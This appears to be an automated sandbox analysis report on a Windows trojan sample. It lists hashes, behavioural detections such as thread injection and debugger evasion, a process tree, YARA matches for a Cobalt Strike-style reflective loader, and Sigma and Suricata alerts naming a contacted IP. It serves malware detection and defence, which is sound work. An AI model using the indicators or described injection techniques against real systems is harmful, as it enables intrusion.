Edit tour

Windows Analysis Report
1731043030539.exe

Overview

General Information

Sample name:	1731043030539.exe
Analysis ID:	1583249
MD5:	0ffa0039c3e96e4b95293b09db72cd85
SHA1:	1b5cc84e46e0c6c40ce64c5d6a18885084da3256
SHA256:	f747fb3f504a9c6b9e83162331951407fdb6d1e9afdfb7955821f2aca03f172b
Tags:	exemalwaretrojanuser-Joker
Infos:

Detection

ReflectiveLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected ReflectiveLoader

AI detected suspicious sample

Allocates memory in foreign processes

Changes memory attributes in foreign processes to executable or writable

Contains functionality to detect sleep reduction / modifications

Contains functionality to inject code into remote processes

Contains functionality to inject threads in other processes

Creates a thread in another existing process (thread injection)

Deletes itself after installation

Found API chain indicative of debugger detection

Found evasive API chain (may stop execution after checking mutex)

Found stalling execution ending in API Sleep call

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Machine Learning detection for sample

Modifies the context of a thread in another process (thread injection)

Sets debug register (to hijack the execution of another thread)

Writes to foreign memory regions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to launch a process as a different user

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to query network adapater information

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found evasive API chain (date check)

Found evasive API chain (may stop execution after checking a module file name)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Uncommon Svchost Parent Process

Suricata IDS alerts with low severity for network traffic

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

1731043030539.exe (PID: 576 cmdline: "C:\Users\user\Desktop\1731043030539.exe" MD5: 0FFA0039C3E96E4B95293B09DB72CD85)

svchost.exe (PID: 6568 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetwork -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

control.exe (PID: 2360 cmdline: C:\Windows\SysWOW64\control.exe MD5: EBC29AA32C57A54018089CFC9CACAFE8)

fontview.exe (PID: 5772 cmdline: C:\Windows\SysWOW64\fontview.exe MD5: 8324ECE6961ADBE6120CCE9E0BC05F76)

resmon.exe (PID: 3376 cmdline: C:\Windows\SysWOW64\resmon.exe MD5: 29C52C15D2D68A4BBE9A36701D31100E)

BackgroundTransferHost.exe (PID: 6404 cmdline: C:\Windows\SysWOW64\BackgroundTransferHost.exe MD5: 0E57CCE96CEE6080C8CB279836EB712C)

raserver.exe (PID: 5568 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: D1053D114847677185F248FF98C3F255)

explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
1731043030539.exe	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
1731043030539.exe	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xabe9a:$s1: _ReflectiveLoader@ 0xabe9b:$s2: ReflectiveLoader@

Memory Dumps

Source	Rule	Description	Author	Strings
0000000A.00000002.3294823523.0000000010273000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000008.00000003.2618083519.0000000002300000.00000020.00000400.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000000.00000002.2066569844.00007FF6E5343000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000001.00000002.3294945185.000001AD8B720000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000001.00000002.3294945185.000001AD8B720000.00000004.00001000.00020000.00000000.sdmp	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth
00000001.00000002.3294945185.000001AD8B720000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x873ca:$s1: _ReflectiveLoader@ 0x873cb:$s2: ReflectiveLoader@
00000001.00000002.3294301221.000001AD8B170000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000001.00000002.3294301221.000001AD8B170000.00000004.00001000.00020000.00000000.sdmp	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth
00000001.00000002.3294301221.000001AD8B170000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x873ca:$s1: _ReflectiveLoader@ 0x873cb:$s2: ReflectiveLoader@
00000009.00000003.2883861414.00000000006B0000.00000020.00000400.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000003.00000003.2037787029.0000000000B10000.00000020.00000400.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000001.00000002.3295082959.000001AD8B7F0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000001.00000002.3295082959.000001AD8B7F0000.00000004.00001000.00020000.00000000.sdmp	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth
00000001.00000002.3295082959.000001AD8B7F0000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x873ca:$s1: _ReflectiveLoader@ 0x873cb:$s2: ReflectiveLoader@
00000006.00000003.2336009620.0000000000820000.00000020.00000400.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000001.00000002.3294759739.000001AD8B650000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000001.00000002.3294759739.000001AD8B650000.00000004.00001000.00020000.00000000.sdmp	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth
00000001.00000002.3294759739.000001AD8B650000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x873ca:$s1: _ReflectiveLoader@ 0x873cb:$s2: ReflectiveLoader@
00000001.00000003.2034894727.000001AD89460000.00000020.00000400.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000000A.00000003.3172524363.0000000002AC0000.00000020.00000400.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000008.00000002.3295072698.0000000010273000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000009.00000002.3294959038.0000000010273000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000000.00000000.2033463108.00007FF6E5343000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000001.00000002.3294544294.000001AD8B580000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000001.00000002.3294544294.000001AD8B580000.00000004.00001000.00020000.00000000.sdmp	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth
00000001.00000002.3294544294.000001AD8B580000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x873ca:$s1: _ReflectiveLoader@ 0x873cb:$s2: ReflectiveLoader@
Process Memory Space: 1731043030539.exe PID: 576	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: svchost.exe PID: 6568	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: control.exe PID: 2360	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: fontview.exe PID: 5772	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: resmon.exe PID: 3376	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: BackgroundTransferHost.exe PID: 6404	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: raserver.exe PID: 5568	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Click to see the 31 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
8.3.resmon.exe.23007f8.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
8.3.resmon.exe.23007f8.0.raw.unpack	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth
8.3.resmon.exe.23007f8.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x873ca:$s1: _ReflectiveLoader@ 0x873cb:$s2: ReflectiveLoader@
1.2.svchost.exe.1ad8b7f0000.6.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
1.2.svchost.exe.1ad8b7f0000.6.raw.unpack	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth
1.2.svchost.exe.1ad8b7f0000.6.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x873ca:$s1: _ReflectiveLoader@ 0x873cb:$s2: ReflectiveLoader@
1.3.svchost.exe.1ad894834c8.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
1.3.svchost.exe.1ad894834c8.0.raw.unpack	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth
1.3.svchost.exe.1ad894834c8.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x873ca:$s1: _ReflectiveLoader@ 0x873cb:$s2: ReflectiveLoader@
3.3.control.exe.b107f8.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
3.3.control.exe.b107f8.0.raw.unpack	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth
3.3.control.exe.b107f8.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x873ca:$s1: _ReflectiveLoader@ 0x873cb:$s2: ReflectiveLoader@
1.3.svchost.exe.1ad89460818.1.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
1.3.svchost.exe.1ad89460818.1.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xa4c7a:$s1: _ReflectiveLoader@ 0xa4c7b:$s2: ReflectiveLoader@
0.2.1731043030539.exe.7ff6e5365cd0.1.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0.2.1731043030539.exe.7ff6e5365cd0.1.raw.unpack	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth
0.2.1731043030539.exe.7ff6e5365cd0.1.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x873ca:$s1: _ReflectiveLoader@ 0x873cb:$s2: ReflectiveLoader@
1.2.svchost.exe.1ad8b170000.2.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
1.2.svchost.exe.1ad8b170000.2.raw.unpack	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth
1.2.svchost.exe.1ad8b170000.2.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x873ca:$s1: _ReflectiveLoader@ 0x873cb:$s2: ReflectiveLoader@
0.2.1731043030539.exe.7ff6e5340000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0.2.1731043030539.exe.7ff6e5340000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xabe9a:$s1: _ReflectiveLoader@ 0xabe9b:$s2: ReflectiveLoader@
1.2.svchost.exe.1800280b0.1.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
1.2.svchost.exe.1800280b0.1.raw.unpack	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth
1.2.svchost.exe.1800280b0.1.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x873ca:$s1: _ReflectiveLoader@ 0x873cb:$s2: ReflectiveLoader@
9.3.BackgroundTransferHost.exe.6b07f8.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
9.3.BackgroundTransferHost.exe.6b07f8.0.raw.unpack	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth
9.3.BackgroundTransferHost.exe.6b07f8.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x873ca:$s1: _ReflectiveLoader@ 0x873cb:$s2: ReflectiveLoader@
0.0.1731043030539.exe.7ff6e5340000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0.0.1731043030539.exe.7ff6e5340000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xabe9a:$s1: _ReflectiveLoader@ 0xabe9b:$s2: ReflectiveLoader@
1.2.svchost.exe.1ad8b650000.4.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
1.2.svchost.exe.1ad8b650000.4.raw.unpack	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth
1.2.svchost.exe.1ad8b650000.4.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x873ca:$s1: _ReflectiveLoader@ 0x873cb:$s2: ReflectiveLoader@
6.3.fontview.exe.8207f8.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0.0.1731043030539.exe.7ff6e5365cd0.1.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
6.3.fontview.exe.8207f8.0.raw.unpack	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth
6.3.fontview.exe.8207f8.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x873ca:$s1: _ReflectiveLoader@ 0x873cb:$s2: ReflectiveLoader@
0.0.1731043030539.exe.7ff6e5365cd0.1.raw.unpack	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth
0.0.1731043030539.exe.7ff6e5365cd0.1.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x873ca:$s1: _ReflectiveLoader@ 0x873cb:$s2: ReflectiveLoader@
1.2.svchost.exe.1ad8b580000.3.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
1.2.svchost.exe.1ad8b580000.3.raw.unpack	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth
1.2.svchost.exe.1ad8b580000.3.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x873ca:$s1: _ReflectiveLoader@ 0x873cb:$s2: ReflectiveLoader@
1.2.svchost.exe.1ad8b720000.5.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
1.2.svchost.exe.1ad8b720000.5.raw.unpack	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth
1.2.svchost.exe.1ad8b720000.5.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x873ca:$s1: _ReflectiveLoader@ 0x873cb:$s2: ReflectiveLoader@
10.3.raserver.exe.2ac07f8.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
10.3.raserver.exe.2ac07f8.0.raw.unpack	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth
10.3.raserver.exe.2ac07f8.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x873ca:$s1: _ReflectiveLoader@ 0x873cb:$s2: ReflectiveLoader@
1.2.svchost.exe.1ad8b7f0000.6.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
1.2.svchost.exe.1ad8b7f0000.6.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x85a84:$s1: _ReflectiveLoader@ 0x85a85:$s2: ReflectiveLoader@
1.2.svchost.exe.1ad8b720000.5.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
1.2.svchost.exe.1ad8b720000.5.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x85a84:$s1: _ReflectiveLoader@ 0x155a84:$s1: _ReflectiveLoader@ 0x85a85:$s2: ReflectiveLoader@ 0x155a85:$s2: ReflectiveLoader@
1.2.svchost.exe.1ad8b650000.4.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
1.2.svchost.exe.1ad8b650000.4.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x85a84:$s1: _ReflectiveLoader@ 0x155a84:$s1: _ReflectiveLoader@ 0x2238ad:$s1: _ReflectiveLoader@ 0x85a85:$s2: ReflectiveLoader@ 0x155a85:$s2: ReflectiveLoader@ 0x2238ae:$s2: ReflectiveLoader@
1.2.svchost.exe.180000000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
1.2.svchost.exe.180000000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xaa07a:$s1: _ReflectiveLoader@ 0xaa07b:$s2: ReflectiveLoader@
1.3.svchost.exe.1ad89460818.1.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
1.3.svchost.exe.1ad89460818.1.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xaa07a:$s1: _ReflectiveLoader@ 0xaa07b:$s2: ReflectiveLoader@
3.3.control.exe.b107f8.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
3.3.control.exe.b107f8.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x85a84:$s1: _ReflectiveLoader@ 0x85a85:$s2: ReflectiveLoader@
10.3.raserver.exe.2ac07f8.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
10.3.raserver.exe.2ac07f8.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x85a84:$s1: _ReflectiveLoader@ 0x85a85:$s2: ReflectiveLoader@
1.2.svchost.exe.1ad8b170000.2.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
1.2.svchost.exe.1ad8b170000.2.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x85a84:$s1: _ReflectiveLoader@ 0x85a85:$s2: ReflectiveLoader@
8.3.resmon.exe.23007f8.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
8.3.resmon.exe.23007f8.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x85a84:$s1: _ReflectiveLoader@ 0x85a85:$s2: ReflectiveLoader@
9.3.BackgroundTransferHost.exe.6b07f8.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
9.3.BackgroundTransferHost.exe.6b07f8.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x85a84:$s1: _ReflectiveLoader@ 0x85a85:$s2: ReflectiveLoader@
0.0.1731043030539.exe.7ff6e5365cd0.1.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0.0.1731043030539.exe.7ff6e5365cd0.1.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x85a84:$s1: _ReflectiveLoader@ 0x85a85:$s2: ReflectiveLoader@
9.2.BackgroundTransferHost.exe.10000000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
9.2.BackgroundTransferHost.exe.10000000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x28e4ad:$s1: _ReflectiveLoader@ 0x28e4ae:$s2: ReflectiveLoader@
6.3.fontview.exe.8207f8.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
6.3.fontview.exe.8207f8.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x85a84:$s1: _ReflectiveLoader@ 0x85a85:$s2: ReflectiveLoader@
0.2.1731043030539.exe.7ff6e5365cd0.1.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0.2.1731043030539.exe.7ff6e5365cd0.1.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x85a84:$s1: _ReflectiveLoader@ 0x85a85:$s2: ReflectiveLoader@
3.2.control.exe.10000000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
3.2.control.exe.10000000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x28e4ad:$s1: _ReflectiveLoader@ 0x28e4ae:$s2: ReflectiveLoader@
6.2.fontview.exe.10000000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
6.2.fontview.exe.10000000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x28e4ad:$s1: _ReflectiveLoader@ 0x28e4ae:$s2: ReflectiveLoader@
1.2.svchost.exe.1800280b0.1.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
1.2.svchost.exe.1800280b0.1.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x85a84:$s1: _ReflectiveLoader@ 0x85a85:$s2: ReflectiveLoader@
10.2.raserver.exe.10000000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
10.2.raserver.exe.10000000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x28e4ad:$s1: _ReflectiveLoader@ 0x28e4ae:$s2: ReflectiveLoader@
1.3.svchost.exe.1ad894834c8.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
1.3.svchost.exe.1ad894834c8.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x85a84:$s1: _ReflectiveLoader@ 0x85a85:$s2: ReflectiveLoader@
8.2.resmon.exe.10000000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
8.2.resmon.exe.10000000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x28e4ad:$s1: _ReflectiveLoader@ 0x28e4ae:$s2: ReflectiveLoader@
1.2.svchost.exe.1ad8b580000.3.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
1.2.svchost.exe.1ad8b580000.3.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x85a84:$s1: _ReflectiveLoader@ 0x155a84:$s1: _ReflectiveLoader@ 0x2238ad:$s1: _ReflectiveLoader@ 0x85a85:$s2: ReflectiveLoader@ 0x155a85:$s2: ReflectiveLoader@ 0x2238ae:$s2: ReflectiveLoader@
Click to see the 85 entries

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\svchost.exe -k LocalServiceNetwork -p, CommandLine: C:\Windows\System32\svchost.exe -k LocalServiceNetwork -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\1731043030539.exe", ParentImage: C:\Users\user\Desktop\1731043030539.exe, ParentProcessId: 576, ParentProcessName: 1731043030539.exe, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalServiceNetwork -p, ProcessId: 6568, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k LocalServiceNetwork -p, CommandLine: C:\Windows\System32\svchost.exe -k LocalServiceNetwork -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\1731043030539.exe", ParentImage: C:\Users\user\Desktop\1731043030539.exe, ParentProcessId: 576, ParentProcessName: 1731043030539.exe, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalServiceNetwork -p, ProcessId: 6568, ProcessName: svchost.exe

Suricata Signatures

ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T09:28:27.682748+0100	2022112	1	Exploit Kit Activity Detected	192.168.2.5	49705	47.76.199.218	80	TCP
2025-01-02T09:28:33.248489+0100	2022112	1	Exploit Kit Activity Detected	192.168.2.5	49706	47.76.199.218	80	TCP
2025-01-02T09:28:38.748633+0100	2022112	1	Exploit Kit Activity Detected	192.168.2.5	49707	47.76.199.218	80	TCP
2025-01-02T09:28:44.165363+0100	2022112	1	Exploit Kit Activity Detected	192.168.2.5	49712	47.76.199.218	80	TCP
2025-01-02T09:28:56.455947+0100	2022112	1	Exploit Kit Activity Detected	192.168.2.5	49780	47.76.199.218	80	TCP
2025-01-02T09:29:01.859281+0100	2022112	1	Exploit Kit Activity Detected	192.168.2.5	49815	47.76.199.218	80	TCP
2025-01-02T09:29:07.263497+0100	2022112	1	Exploit Kit Activity Detected	192.168.2.5	49850	47.76.199.218	80	TCP
2025-01-02T09:29:12.685796+0100	2022112	1	Exploit Kit Activity Detected	192.168.2.5	49883	47.76.199.218	80	TCP
